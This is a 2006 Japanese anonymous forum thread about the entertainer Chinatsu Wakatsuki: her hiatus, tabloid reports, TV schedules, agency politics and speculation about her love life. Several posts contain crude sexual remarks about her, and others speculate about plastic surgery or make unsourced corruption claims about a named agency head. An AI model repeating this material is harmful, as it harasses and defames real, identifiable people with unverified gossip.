147 :通行人さん@無名タレント:2006/12/11(月) 12:37:54 ID:9StN+L6a
「うまっち」「スーパー競馬」鬱らNEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE!!

148 :通行人さん@無名タレント:2006/12/11(月) 12:39:19 ID:wsOPnl/X
病気じゃないじゃん

149 :通行人さん@無名タレント:2006/12/11(月) 18:37:56 ID:INvwkKWU
●ワイド特集:キムタクだけじゃない「この人たちの一分(いちぶ)」(抜粋)
・休養前に「若槻千夏」が抱えていた"貧乳の悩み"
http://opendoors.asahi.com/data/detail/7793.shtml
週刊朝日(12/22)



150 :通行人さん@無名タレント:2006/12/11(月) 20:25:00 ID:sbAwOM86
>>146
期間工で一週間入院して穴空けましたが何か?
まぁ上司には事情説明してたし、事前に風邪で体調おかしくなった時も逐一報告してたから無事復帰した。
軽度で早く回復したからよかったが、長かったら仕事柄新しい人入れてるだろうね

151 :通行人さん@無名タレント:2006/12/11(月) 23:05:13 ID:zdmgkhQB
ニート、職業観について語る。

152 :通行人さん@無名タレント:2006/12/12(火) 01:38:31 ID:AKRchJlT
この子沢尻と友達なったんだろ。変な自意識身に着けてないと良いけどな。
役者だったら良いけどバラエティ―だからな。

153 :通行人さん@無名タレント:2006/12/12(火) 01:48:21 ID:44GrFCim
「品乳に悩み40日休業」

週刊朝日は東スポから記者でもやっとたのか?

154 :通行人さん@無名タレント:2006/12/12(火) 08:58:24 ID:BpKZ9ynY
レギュラーの分は今年の分撮り終わってるみたいなので
本格的には来年か?

155 :通行人さん@無名タレント:2006/12/12(火) 20:15:58 ID:LDfa0uBs
正直しんどいんだろ

156 :通行人さん@無名タレント:2006/12/13(水) 00:03:51 ID:wQCPYyQa
沢尻ってあびる本人が親友って言うほど仲良いのに若槻とも仲良いんだな。
あびると若槻も仲良いのかも。キャラがかぶってるけど。

157 :通行人さん@無名タレント:2006/12/13(水) 00:19:17 ID:2hIkVK0I
>>156
番組で↓のようなこと言うのに仲良いとは思えん。むしろ反面教師?
ttp://up.nm78.com/old/data/up120119.jpg

沢尻との噂もどうなんだろ。映画で共演したから知り合いって程度なんじゃ。
グラビア会の話はしょっちゅうしてるが沢尻の事話してるのなんて見たことない。

158 :通行人さん@無名タレント:2006/12/13(水) 14:04:36 ID:CKxTLEVy
若槻はしょこたんと仲が良くなったんだろ。しょこたんと沢尻は昔から
親友だろ。

159 :通行人さん@無名タレント:2006/12/13(水) 19:01:33 ID:ocBzeNX6
横のつながりが広いチナッティーが打倒長澤をかかげる沢尻には魅力的なんだろ
マスコミは沢尻の子分みたいに書いてるけど
チナッティーが一番仲がいいのはMEGUMIだし

160 :通行人さん@無名タレント:2006/12/13(水) 21:01:16 ID:OwIVEiv5
ギャラで揉めて仕事をボイコットしながら
何事もなく復帰なんてふざけるな!だな。
芸能界は甘すぎるよ。

161 :通行人さん@無名タレント:2006/12/14(木) 01:03:06 ID:3EI3Yx8Q
どう考えても、若槻と沢尻が仲良くなるとは思えん。
若槻が疲れちゃうから嫌だとかいいそうだし。
めんどくさいの嫌いだろ、若槻は。

162 :通行人さん@無名タレント:2006/12/14(木) 07:50:46 ID:Wlh56NV7
●若槻千夏−謎の休養50日に「青山デート」を目撃撮!

女性セブン(12/28&1/1合併号)

163 :通行人さん@無名タレント:2006/12/14(木) 10:19:58 ID:zlq+cN7t
内容しらねーけどこいつ社会人として休養中に.......
おかしーだろ


164 :通行人さん@無名タレント:2006/12/14(木) 12:40:30 ID:h41BPBaR
デート詳細キボン!

165 :通行人さん@無名タレント:2006/12/14(木) 14:04:03 ID:6CR0XtPc
titimisero

166 :通行人さん@無名タレント:2006/12/14(木) 17:23:02 ID:+hU7+JsX
女性セブンはお父さんとお母さんのインタビュ−が載ってるな。
お父さんは「ストレス」ってのを何回も口にしてたみたいだ。

167 :通行人さん@無名タレント:2006/12/14(木) 19:12:45 ID:opqhzBCa
金のたストレス貯めてまで、居てもらうと他の共演者に名訳になるから

もう栗原さんのお母さんお父さん金の事考えないでね



168 :明石家よゐこ ◆c3SAmMA3sg :2006/12/14(木) 19:53:46 ID:1ksGYSvD
今年もオールザッツの司会
http://www.mbs.jp/manzai2006/

169 :通行人さん@無名タレント:2006/12/14(木) 22:23:41 ID:r4hDReI1
【司会】陣内智則、若槻千夏(予定)もし若槻痛になったら糊化が司会なら見に行く
【出演】ケンドーコバヤシ、バッファロー吾郎、たむらけんじ、シャンプーハット、チュートリアル、ブラックマヨネーズ、友近、レイザーラモン、笑い飯、麒麟、千鳥、南海キャンディーズ ほか残り物多数!


170 :通行人さん@無名タレント:2006/12/14(木) 22:31:11 ID:lx3o/R0P
若槻好きだけど世間の人は若槻が休業してることも知らず
最近見なくなったね〜って思ってることが悲しいな。
ワイドショーで全然報道してなかったし。

171 :通行人さん@無名タレント:2006/12/14(木) 22:31:39 ID:3EI3Yx8Q
無理しないように。

172 :通行人さん@無名タレント:2006/12/14(木) 22:47:07 ID:ghGbJCAd
オールザッツって深夜で5時間司会だろ。本当に病気ならやめたほうが
良いような気もするんだが。

173 :通行人さん@無名タレント:2006/12/14(木) 23:52:53 ID:quLTuTbQ
でも同業で代わりにできる奴はいないだろう

174 :通行人さん@無名タレント:2006/12/15(金) 00:16:10 ID:3dt6S+Q9
ナイスポは無差別に基地外みたいな文章でタレントを叩いてるから論外としてこのコは
マスコミに中傷される記事が急にたくさんのメディアで書かれるようになった理由を
考えてみた。

@事務所が書かせてる。事務所の後ろ盾がなかったらお前なんてこうなるんだよって
のを若槻に知らしめてる。
Aライバル事務所が書かせてる。特にキャラがかぶるタレントの事務所とか。
Bかくし芸を休んだ。(ナベプロが今でも仕切ってるのか知らないが、どこでも
大変大きな事務所だからバーニング系とは傍流の若槻の事務所じゃバッシングを
防げない)

175 :通行人さん@無名タレント:2006/12/15(金) 23:46:15 ID:se/DKIli
http://news18.2ch.net/test/read.cgi/mnewsplus/1166191856/l50

176 :通行人さん@無名タレント:2006/12/16(土) 00:26:55 ID:VpypliFX
ドライブ&デートについて事務所がスルーしてる件について

177 :通行人さん@無名タレント:2006/12/16(土) 00:52:21 ID:75JCqYU0
グラビアトークオーディションは完全に降りたって事?


178 :通行人さん@無名タレント:2006/12/16(土) 02:38:25 ID:qI67jGDM
>>174
若槻の事務所って力あると思うよ。
休養のことがワイドショーの類で一切流れなかったのは事務所パワーでしょう。
週刊誌なんて、事務所の力関係なく書くときは書くでしょ。
藤原紀香だって今まで散々書かれたし。

179 :通行人さん@無名タレント:2006/12/16(土) 02:39:10 ID:ahdQxMPX
沢尻と仕事してなんかいろいろ考えたのかも知れないな。実際このコの事務所と
スタ―ダストじゃ大違いだからな。

180 :通行人さん@無名タレント:2006/12/16(土) 14:04:57 ID:waYiqXwM
>>174>>178
↑なんでこういう盲目でアホなファンが多いのかね・・・


せっかくキチガイは女性アイドル板に隔離したと思ったのに

181 :通行人さん@無名タレント:2006/12/16(土) 14:10:10 ID:6GjuVjpR
http://shmyl.com/txpnson


182 :通行人さん@無名タレント:2006/12/16(土) 15:29:30 ID:YuOR9Gt5
>>180
おめえはどんだけ賢いファンなんだ?

183 :通行人さん@無名タレント:2006/12/16(土) 16:07:25 ID:PvKwjynP
隔離したとかバカじゃねえの

184 :通行人さん@無名タレント:2006/12/16(土) 16:14:59 ID:4pqs4ofP
>>178
力あるのかね?
戦力になる所属タレントの数とか質的には、アバンと同レベルor格下くらいだろうけど、
アバン所属のゆうこりんは893対応でえらい叩かれてたしな
真相が良くわからないから、報道はしないのかも・・・
本当に病気だったら、さすがに倫理観問いたくなるし

185 :通行人さん@無名タレント:2006/12/16(土) 16:33:31 ID:VLlpcWoO
グラビア系の事務所は基本的に力ないよ。最下層じゃねえの?バーニング系列って言うのは
バーニングに版権とか利権とか納めてるからだけで多少スキャンダル抑えてもらえるだけで
そういうことしなきゃ弱い事務所はマスコミに書かれたい放題になっちゃうからね。


186 :通行人さん@無名タレント:2006/12/16(土) 17:02:12 ID:VLlpcWoO
芸能事務所

バーニング ジャニーズ ケイダッシュ 研音 吉本 ホリプロ ナベプロ
イザワオフィス スタ−ダスト アミュ−ズ エイベックス ヴィジョンファクトリー 
プロダクション尾木 長良プロ アップフロント

有力事務所事務所はこういう感じじゃないかな。

187 :通行人さん@無名タレント:2006/12/16(土) 17:11:22 ID:VLlpcWoO
バーニングプロダクション。

諸悪の根源バーニングプロダクション社長、周防郁雄。すべてはこの男から始まる。
周防は浜田幸一、北島三郎の運転手を務め、新栄プロ、ホリプロ、渡辺プロダクション
を渡り歩きながら力を付け、ハマコーとの関連から政界にも顔が利く。

版権ビジネスに目を付け、所属アーティストのみならずサザンオールスターズや小室哲哉
など楽曲の頒布権を所有。資金薄となったプロダクションに資金を提供し、その見返りに
軍門に下らせる。

系列となったプロダクションを番組、イベントなどにブッキングする代わりにギャラの
マージンを大量に搾取するなどやりたい放題。また、マスコミ、政界にも顔が利くため、
事件を起こしたタレントにその隠蔽を図る代償として、ギャラ、頒布権などを強奪する。

バーニングプロダクション本体のタレント数は少ないが、系列に数多くのプロダクション
があり、日本の芸能プロダクションの実に9割が単純に数の上ではバーニング系ともいわれ
、タレントはバータレと揶揄される。WaTはこの事務所でなければ、紅白歌合戦最速出演は
できなかったはず。

●音事協所属。所属事務所同士のつながりがある。

郷ひろみ、小泉今日子、長山洋子、藤あや子、加藤雅也、 鈴木蘭々(泣かないぞェ)、島谷
ひとみ、松方弘樹、稲森いずみ、ウエンツ瑛士、小池徹平(WaT)、井澤健、小柳ゆき、須賀
貴匡、内田有紀(当然のように復帰)

元・在籍 松雪泰子 水野美紀(2005年退社)

188 :通行人さん@無名タレント:2006/12/16(土) 17:26:29 ID:VLlpcWoO
バーニングプロダクションのタレントとバーニング系列のタレントでは当然扱いが
違い、バーニング系列の中でもグラビアアイドルがいるような事務所は最下層の扱い
なので当然芸能界的に力がない。

バーニング系列のグラビア事務所はバーニングにタレントのギャラを納めなきゃなら
ないので当然普通の事務所のタレントよりギャラが安い。若槻はこの事務所をやめて
別の大手事務所に移籍すりゃ今の5倍はギャラもらえるだろうと思う。若槻は沢尻
エリカと仲よくなったって話しだし、普通に自分のギャラが完全におかしいことが
わかったのかも知れない。

189 :通行人さん@無名タレント:2006/12/16(土) 17:48:53 ID:dNcOqD/y
だからといってバー系を辞めるなんて自殺行為
バー系に対抗できる強い後ろ盾がなければ水野美紀みたいに完全に干される

190 :通行人さん@無名タレント:2006/12/16(土) 21:20:22 ID:98MwDgqX
若槻とエッチしたくてタマランw

191 :通行人さん@無名タレント:2006/12/17(日) 00:09:34 ID:cNRO0qvY
もしギャラと将来の保障が問題なら沢尻を頼ってスタ−ダスト入りか思い切って吉本入りか。
吉本は松竹のオセロみたいな女性タレントが欲しいらしいよ。見栄えがよくて司会が出来て
バラエティ−対応力のあるタレントが欲しいみたいだ。プラチアムへの見返りとして吉本系列
の番組に若槻以外の所属のタレントを優先的に起用することやある程度の金を払えばない話では
ないと思う。その場合は将来的に若槻はオセロ中島みたいな方向性になる。


192 :通行人さん@無名タレント:2006/12/17(日) 00:17:31 ID:EoPVxxzU
若槻ぬけたらプラチナムはボロボロじゃん。

193 :通行人さん@無名タレント:2006/12/17(日) 02:17:30 ID:xAAgzYdh
JRAは今年いっぱいで若槻を降板させることが確定。さすが博打の胴元だな。
バー系でもフジTVでも逆らえんw

194 :通行人さん@無名タレント:2006/12/17(日) 11:30:13 ID:l719KgYI
JRAはいつ若槻を起用したんだ

195 :通行人さん@無名タレント:2006/12/17(日) 15:09:40 ID:NY9G0Wa1
‘07年1月2日(火)深夜0:55‐4:00
 グラビアトークオーディションSP(仮)

これの司会に若槻が帰ってくるかどうかで、テレビ局が若槻をどう扱かってくつもりか
ちょっとは分かるかも
年末の陣内とやるやつも、若槻復帰予定みたいだけど、あれは関西のみだしなぁ
フジがどうするか見物だが・・・
チナッティーの抜けた穴は大きそうだな

196 :通行人さん@無名タレント:2006/12/17(日) 15:10:35 ID:NY9G0Wa1
あ、でもこれって生じゃないよな・・・?
だったらもう収録終わってる可能性もあるのか

197 :通行人さん@無名タレント:2006/12/17(日) 15:11:44 ID:vCI4W+7S
今週もスーパー競馬仮病かよ

198 :通行人さん@無名タレント:2006/12/18(月) 01:00:47 ID:dpVXRdlP
>>195-196
11日に収録終わってるらしい


199 :通行人さん@無名タレント:2006/12/18(月) 03:22:22 ID:y6dWNnqt
その番組も何を意図してるのかわからない番組だったな。

200 :通行人さん@無名タレント:2006/12/18(月) 03:25:14 ID:xz+34vMz
なぜ若槻はあんなに可愛いの??やばい!!

201 :通行人さん@無名タレント:2006/12/18(月) 05:55:21 ID:RnThXOLj
若槻のとこの社長ってどんな人なの?
893?
辞めさせちゃったの?

202 :通行人さん@無名タレント:2006/12/18(月) 08:52:04 ID:qfavRbV3
JRAの二番組を降板させられて残念


203 :通行人さん@無名タレント:2006/12/18(月) 08:56:56 ID:BPNrgbhR
もとから12月いっぱいの契約でない?

204 :通行人さん@無名タレント:2006/12/18(月) 10:04:41 ID:/3wubnTg
肉壷

205 :通行人さん@無名タレント:2006/12/18(月) 13:08:19 ID:B73IaAVj
いじめてみたい。

206 :通行人さん@無名タレント:2006/12/18(月) 21:37:34 ID:EtKvLLsE
12/25 CX  「ネプリーグ」(再) 17:00〜17:50
12/29 MBS 「オールザッツ漫才」(関西ローカル) 24:15〜29:30
12/31 CX  「芸能人最強運決定戦」 24:45〜26:15

207 :通行人さん@無名タレント:2006/12/18(月) 23:54:41 ID:U51HydSv
間近でパンチラ拝みたい

208 :チナッチャンサイコー:2006/12/19(火) 15:49:44 ID:gB6VFmEg
若槻千夏アカデミーって言う
非売品の本手に入れました!!
どのくらいの値段で売れるかなぁ??

209 :通行人さん@無名タレント:2006/12/19(火) 16:33:17 ID:Mu5HnRTC
きさまぁーー!売るのかぁーー!チナティーーーで金もうけぇー?私刑だ!

210 :通行人さん@無名タレント:2006/12/19(火) 18:55:25 ID:0MVThJ0X
若槻一家の銭ゲバはスルーか?
事務所のピンハネもスルーか?

211 :明石家よゐこ ◆c3SAmMA3sg :2006/12/19(火) 20:55:32 ID:0o2zt/eI
秋葉原電気祭のCMって最近始まったのかな
初めてさっき見たけど

212 :通行人さん@無名タレント:2006/12/20(水) 00:15:13 ID:ov54W2Bw
ここ2週間くらいかと

213 :通行人さん@無名タレント:2006/12/20(水) 02:05:45 ID:FjaNjxBh
電気街祭が勤労感謝の日からだから、ずいぶん前からやってるはず

214 :通行人さん@無名タレント:2006/12/20(水) 05:11:47 ID:MSdyt+uv
虚弱タレント

可愛か眼科医行け

215 :チナッチャンサイコー:2006/12/20(水) 09:17:32 ID:ZZHOYdtT
若槻千夏アカデミー最高゚.+:。∩(・ω・)∩゚.+:。ゎ〜ぃ

216 :通行人さん@無名タレント:2006/12/20(水) 16:34:21 ID:gecLDnqZ
さあ今週本人からどんな一言がでるか、たのしみ

217 :通行人さん@無名タレント:2006/12/21(木) 02:30:17 ID:CKtMc2Pr
ブログ検索してて見つけたがうまっちの後番組は「うまなで」っていうのになるらしい。
新しい番組の布陣は11月中には決まってたみたい(女3人が司会らしいが・・・)。
千夏が休んだせいで終わるわけではなさそうだね。

218 :通行人さん@無名タレント:2006/12/21(木) 13:28:32 ID:uo9udi56
やっと復帰か。長い沈黙だったなあ。
事務所を通しての本人のコメントも一切なしなんて異例だったよな。
もし本当に再活動するのなら、この件で失ったものがあまりにも大きいので間違いなく茨の道だろうが
肩の力を抜いて気楽に頑張ってほしいね。

219 :通行人さん@無名タレント:2006/12/21(木) 13:34:11 ID:A177DKUp
北陽と、しりとりしていたのは収録?

220 :通行人さん@無名タレント:2006/12/21(木) 16:54:18 ID:K+hBBWMy
復帰したあと会見かなにか開くのかな?

221 :通行人さん@無名タレント:2006/12/22(金) 05:52:42 ID:mAfpThaR
【テレビ】安田美沙子・東原亜希・今井りかの美女3人で1/6フジ系「うまなで」スタート
http://news18.2ch.net/test/read.cgi/mnewsplus/1166732335/l50

222 :通行人さん@無名タレント:2006/12/22(金) 17:54:10 ID:3uXvM+4j
01/03 「堂本剛の朝までしんどいSP」

▼ゲスト
アンガールズ、井上和香さん、
タカアンドトシ、友近さん、中川家、
東原亜希さん、ほっしゃん。若槻千夏さん などなど

今年も新年1発目は生放送から!!
「朝までしんどい」2007年Verをお送りします。
今年は生放送で連続企画に挑戦!
連続おでん値段アップ、連続ホールインワン
更に!新春若手マニアック芸人ライブや早朝カラオケ大会など
楽しい企画がてんこ盛り!!
正月は「朝までしんどい」で決まり!!!

@公式HPより

223 :通行人さん@無名タレント:2006/12/22(金) 21:14:54 ID:pQllwQLe
若槻一家の銭ゲバは成功したらしいな。

224 :通行人さん@無名タレント:2006/12/23(土) 00:14:35 ID:JLS9rrub
>>222
やっぱり出るのか。前回は若槻うるさい・態度悪いと実況で総叩き、
たしかヲタスレでも評判悪かったが今度は大丈夫か?

しかし復帰した途端オールザッツ漫才とこれで夜通し出演が2回か。
長く休んだ分働かされるな。有難いことなんだろうが。

225 :通行人さん@無名タレント:2006/12/23(土) 04:15:36 ID:pfQJsas5
ナイスポはガセばかりだが、ピラミッドが営業かけて来るってのは
当たってたな

226 :通行人さん@無名タレント:2006/12/23(土) 08:01:09 ID:SzkFpNJl
千夏は巧そう

227 :通行人さん@無名タレント:2006/12/23(土) 15:33:09 ID:CahSKxF0
ノロ

228 :通行人さん@無名タレント:2006/12/23(土) 18:03:17 ID:IkhkLGI+
>>222
>東原亜希さん、ほっしゃん。若槻千夏さん などなど

同じ事務所でなんとなくキャラかぶりしそうね東原と若槻をバッティングさせることってあるか?
しかも若槻の方が名前後ろだし
バーターにしてもおかしい
多分、若槻がダメそうだったら、東原がスタンバイってことなんだろうな



229 :通行人さん@無名タレント:2006/12/23(土) 22:14:15 ID:hrXjTPQ5
12/29(金)深夜0:15〜5:30毎日
「オールザッツ漫才2006!」
12/30(土)正午 〜後1:30日テレ
「メレンゲの気持ち」
1/2(火)深夜0:55〜4:00フジ/関テレ系
「女だらけのかうんとだうん新年会」
1/7(日)後3:00〜4:00フジ
「スーパー競馬」
1/8(月)後11:55〜深夜1:25毎日
「明石家電視台名場面集〜笑いの数は日本一!?サンマン監督もシンジラレナーイSP」

230 :通行人さん@無名タレント:2006/12/23(土) 23:17:36 ID:oRHvUcNi
>>228
しんどいの公式に二人共載ってるから出るんじゃね?

231 :通行人さん@無名タレント:2006/12/24(日) 00:55:29 ID:PpWvgWKB
メレンゲは生放送?総集編?

232 :通行人さん@無名タレント:2006/12/24(日) 02:29:44 ID:Uio2DPtV
ちょっと太ってたな。休んでたから仕方ないか。
でも元気そうでヨカタヨカタ。出た時のパンチラしたかも映像は良かった♪

233 :通行人さん@無名タレント:2006/12/24(日) 03:16:11 ID:mswNyEOh
>>232
俺の住んでる地域移らないんで静止画キャプだけでないですか?

234 :通行人さん@無名タレント:2006/12/24(日) 06:29:53 ID:DczsvTIr
ttp://www.sponichi.co.jp/entertainment/news/2006/12/24/01.html

235 :通行人さん@無名タレント:2006/12/24(日) 12:22:08 ID:JRXszaIx
仮病で打ち切り

236 :通行人さん@無名タレント:2006/12/24(日) 12:23:31 ID:PoZy3mXJ
ゴリラ娘復帰

237 :通行人さん@無名タレント:2006/12/24(日) 13:07:49 ID:suZ8itnl
先生!レギュラーが減って・・・レギュラーが・・・・

238 :通行人さん@無名タレント:2006/12/24(日) 15:13:28 ID:qZ9ybfeV
今出てるけど録画?

239 :通行人さん@無名タレント:2006/12/24(日) 15:15:09 ID:g16uHm57
なーんだ、競馬番組にでてるじゃん

240 :通行人さん@無名タレント:2006/12/24(日) 15:19:43 ID:dacWR58U
                              ┏┓                      ┏┓┏┓
                              ┃┃    ┏━━┓┏┓┏━━┛┗┻┫
┏┓          ┏┓          ┏┛┗━┓┃┏┓┃┗┛┃┏━┓┏━┛┏┓       
┃┃    ┏┓  ┃┃    ┏┓  ┗┓┏┓┃┃┃┃┃┏┓┃┣━┫┗┓  ┃┃┏━━┓
┃┗┓  ┃┗┓┃┗┓  ┃┗┓  ┃┃┃┃┃┃┃┃┗╋┫┣━╋┓┃  ┃┃┗━━┛
┗┓┃  ┗┓┃┗┓┃  ┗┓┃┏┛┃┃┃┃┃┃┃┏┛┃┃□┃┃┗┓┃┃       
  ┃┗┓  ┃┃  ┃┗┓  ┃┃┃┏┛┃┃┃┃┃┃┃┏┫┣━╋┛┏┛┃┃┏━━┓
  ┗━┛  ┗┛  ┗━┛  ┗┛┃┃┏┛┃┃┗┛┃┗╋┛┃  ┗┓┗┓┗┛┗━━┛
                            ┗┛┗━┛┗━━┛  ┗━┛    ┗━┛                 

   
   r⌒)
  / . ,-二二二、"""ニ二二./                    _.-ー 、                 _,___
 ./ . / i ̄´二 ̄  .,,二,゙ ゙̄'i      rニ-,            ゙ヽ  / ,_          ,. ..--‐'″ .`/
../. / | |  .i....../  i........,i  /       .| .|_,,,,,、    .r‐ 、 │ .! l .`'i       .\,   ../
,/イ | |  iニニi  .i;;;;;;;;i  (     . │r‐―┘    |  .←´  ^゙"   /        ,/’ .,/__
  |  | !  ,,,,..、  ._____  /       .| .|       .く, ._,,__ , ィ¬__./       ./    .__, `''、.
  |  |  `^゙.l"'''′./    .`´     ___,| .|       .r‐-、 .|  .|  .l ~゙\    ,i'" ., /^´ │ │
  |  |   ./ ,、゙'ー、,,____    l'゙r‐ーッ 二―    |  ゝー'′  ̄´゛  /    .|__/    /   ./
  |,,,ノ  ∠--'"゛ .`'ー..,,,__  ヽ   ‘'ニニニ-′`''-ノ    !  .,.. -―''''''''''l  /           <;;,゙゙___,,,./
               `゙'''''''               `''"       `''"


241 :通行人さん@無名タレント:2006/12/24(日) 15:39:33 ID:7JZjjbby
休業前によく言っていた言葉。
「私普段はこんなんじゃないんです!」

堂本兄弟では、マネージャーともめて何故かしっとりした曲歌ってたし。


242 :通行人さん@無名タレント:2006/12/24(日) 15:50:10 ID:nt8H4mPk
ちゃっかり整形してるじゃん。目と目の間が高くなっとる。

243 :通行人さん@無名タレント:2006/12/24(日) 16:23:21 ID:qZ9ybfeV
あびると呼ぼうw

244 :通行人さん@無名タレント:2006/12/24(日) 16:25:58 ID:CAj80aKq
目いじったね

245 :通行人さん@無名タレント:2006/12/24(日) 20:32:50 ID:JRXszaIx
整形休暇だったのか! 埋没二重になってた!

246 :通行人さん@無名タレント:2006/12/24(日) 21:29:59 ID:VGCYgv+6
938 :ファンクラブ会員番号774:2006/12/24(日) 18:46:46 ID:z1ocwXAh
スッパー競馬の
千夏、可愛いかったよ。
マジで、千夏の校門舐めたおしたかった。
これからも、
頑張ってなぁ・・・。




247 :通行人さん@無名タレント:2006/12/24(日) 23:31:13 ID:pIgDchVH
一切の遠慮無しで思い切り大量のザーメンをオマンコの奥に中出ししたい。

248 :通行人さん@無名タレント:2006/12/24(日) 23:33:49 ID:NMlpaHuT
あびるも深田も整形後モロだったな

249 :通行人さん@無名タレント:2006/12/24(日) 23:47:46 ID:K8c/peX6
若槻番組打ち切りにしてしまった

250 :通行人さん@無名タレント:2006/12/25(月) 00:01:56 ID:YI1XE2tM
千夏様で変な妄想をしないで

251 :通行人さん@無名タレント:2006/12/25(月) 00:50:59 ID:SZgD+lx0
明石家サンタ

252 :通行人さん@無名タレント:2006/12/25(月) 00:56:13 ID:LiTmrUmF
ヤバイ…明石家サンタの電話,涙でそうになった(:_;)
若槻ガンバレ

253 :通行人さん@無名タレント:2006/12/25(月) 00:57:33 ID:9/0Djtaj
東京以外の人間としては初めて復帰後のチナッティーだな
しかし元気なかったな
さんまの優しさを感じたな

254 :通行人さん@無名タレント:2006/12/25(月) 00:57:48 ID:iKpX/pmJ
明石家サンタで泣いてたね・・・・・・

255 :通行人さん@無名タレント :2006/12/25(月) 00:57:49 ID:hSe3yopF
片思いの相手ってだれ??

256 :通行人さん@無名タレント:2006/12/25(月) 00:58:19 ID:8o9/ivXw
パソコンをユニセフになんて…
めちゃ良い娘じゃん

257 :通行人さん@無名タレント:2006/12/25(月) 00:59:25 ID:iiIQ6BQ+
堂本剛

258 :通行人さん@無名タレント:2006/12/25(月) 01:01:00 ID:6ShM2oNh
片思いの相手はみんな知ってる芸能人

259 :名無し:2006/12/25(月) 01:03:06 ID:6LfUiD45
本当に堂本剛なの??

260 :通行人さん@無名タレント:2006/12/25(月) 01:03:55 ID:6ShM2oNh
本当に剛かよ!

261 :通行人さん@無名タレント:2006/12/25(月) 01:05:27 ID:rlwTTYbQ
片思いって誰かマジ気になる。誰か知ってる方、教えてさい。めちゃ泣いてて、かわいそぅやった。

262 :通行人さん@無名タレント:2006/12/25(月) 01:05:29 ID:kbU4yEHV
八木さんが知ってる人みたいだからフジの社員とかじゃないか?
23日って仕事復帰初日(うまっち)だろ

263 :通行人さん@無名タレント:2006/12/25(月) 01:09:04 ID:7pRb2IuR
ジャニだったらさんまはテレビで言わないと思う

264 :通行人さん@無名タレント:2006/12/25(月) 01:09:11 ID:Dw1gFG94
若槻AVいくって噂本当ですか?

265 :名無し:2006/12/25(月) 01:09:37 ID:6LfUiD45
片思いの相手は剛なの??????

266 :通行人さん@無名タレント:2006/12/25(月) 01:11:33 ID:D9NE9CRg
すごい気になる!

267 :通行人さん@無名タレント:2006/12/25(月) 01:11:59 ID:zpqj1wUU
おしえねーよっ

268 :通行人さん@無名タレント:2006/12/25(月) 01:12:36 ID:LXfeuY7E
福永祐一

269 :通行人さん@無名タレント:2006/12/25(月) 01:14:28 ID:OHDZ4xGM
堂本剛も罪なやつだな

270 :通行人さん@無名タレント:2006/12/25(月) 01:14:46 ID:sKZR7Um6
>>262
それは八木の身内という意味ではなく
前に食事会で八木に話した人ってことでしょ
さんまが『あの時おれがもうあかんっていったやろ』って八木に言ってるし


271 :通行人さん@無名タレント:2006/12/25(月) 01:15:06 ID:4Uob1tbM
剛なら、かなり前から週刊誌にモデルの彼女がいるって書かれてたよ
それを23日に知ったというのは変だと思うけど

さんまは連絡するほど仲が良いジャニタレいるかな?
さんまも八木もよく知ってる人ってのは、やっぱ社員なんじゃない?番組スタッフとか

272 :通行人さん@無名タレント:2006/12/25(月) 01:17:06 ID:+OLi+mek
千夏イヴの夜は寂しくすごしてるんだな

273 :通行人さん@無名タレント:2006/12/25(月) 01:17:20 ID:dh58/toX
>>268
古いだろww

274 :通行人さん@無名タレント:2006/12/25(月) 01:17:59 ID:L595FVwS
マネージャー説は?

275 :通行人さん@無名タレント:2006/12/25(月) 01:18:26 ID:c3WLxvms
渡邊アナとかだろ


276 :通行人さん@無名タレント:2006/12/25(月) 01:21:11 ID:sKZR7Um6
渡辺アナはとっくの昔にテレビでも彼女いると公言してる

277 :通行人さん@無名タレント:2006/12/25(月) 01:21:44 ID:rgVAkdKl
今、本人2ちゃん見てそうな気がする。
どーせ暇なんだし。

278 :通行人さん@無名タレント:2006/12/25(月) 01:21:52 ID:6ShM2oNh
結局みんなわかんないんだな!誰かいろんな板いって探してきてくれ

279 :通行人さん@無名タレント:2006/12/25(月) 01:24:23 ID:Z1/07/H4
ロバ-ト秋山。確実!

280 :通行人さん@無名タレント:2006/12/25(月) 01:24:48 ID:4Uob1tbM
>>276
俺は知らなかったけど渡辺って結婚してるってよ

281 :名無し:2006/12/25(月) 01:25:35 ID:6LfUiD45
剛のモデルの彼女説は無いね。

282 :通行人さん@無名タレント:2006/12/25(月) 01:25:42 ID:sKZR7Um6
>>280
もう一人の渡邊はね
渡辺カズはまだだけど

283 :通行人さん@無名タレント:2006/12/25(月) 01:27:08 ID:v6dTFshP
千夏ちゃん(´・ω・`)

284 :通行人さん@無名タレント:2006/12/25(月) 01:35:26 ID:c4vaKLC+
え?今やってる若月ってさんまの番組に電話相談して片思い中って言ったの?

285 :通行人さん@無名タレント:2006/12/25(月) 01:35:41 ID:dh58/toX
>>278
自分で池

286 :通行人さん@無名タレント:2006/12/25(月) 01:37:27 ID:CR9NrfZW
>>284
片思いだったけど23日にその相手に彼女いることが発覚してしまったんだと

287 :通行人さん@無名タレント:2006/12/25(月) 01:39:11 ID:c4vaKLC+
>>86
ありがとう、すごいこと相談したな。泣いてたの?

288 :通行人さん@無名タレント:2006/12/25(月) 01:39:17 ID:4Uob1tbM
>>282
あっ!そうなのか
カズのことかと思ってた
勘違いしてたわ。ありがとね

289 :通行人さん@無名タレント:2006/12/25(月) 01:39:57 ID:y9Zbp2GP
泣いてたのう
つか俺ならいつでも結婚OKなんだが

290 :通行人さん@無名タレント:2006/12/25(月) 01:40:56 ID:c4vaKLC+
>>286
ありがとう、すごいこと相談したな。泣いてたの?

291 :通行人さん@無名タレント:2006/12/25(月) 01:43:02 ID:c4vaKLC+
泣いてたの??すごいね。番組の空気とかはどんな感じなの?

292 :通行人さん@無名タレント:2006/12/25(月) 01:51:33 ID:iKpX/pmJ
笑えない、リアルに重い感じだったよ。サンマと八木は一生懸命フォローしてたけど
聞いてるだけで泣けそうな悲しさが伝わって来たorz 

テレビであんなんしちゃうって、かなり落ちてるね。酔っ払って止まらなかったのかな。

293 :通行人さん@無名タレント:2006/12/25(月) 02:00:36 ID:gmtL4qjQ
>>292さんまがフォローって当然だろ、そもそもその話引っ張り出してきたのはさんまなんだし。いくら大御所だからって言っていいこと、悪いことがあんだろ!ホント空気読めねぇなさんまは。

294 :通行人さん@無名タレント:2006/12/25(月) 02:02:11 ID:c4vaKLC+
まぁ今は年令的にも精神的に不安定な時期なんだろう

295 :通行人さん@無名タレント:2006/12/25(月) 02:03:58 ID:zadk5sG8
堂本剛最低だよな。若槻に気を持たせるような行動して結局彼女
いたのか。

あんなに落ち込んでるじゃん。

296 :通行人さん@無名タレント:2006/12/25(月) 02:08:11 ID:/pRAht/w
ロバート秋山は確実なの??

297 :通行人さん@無名タレント:2006/12/25(月) 02:09:54 ID:6LfUiD45
やっぱり堂本剛なのかい?

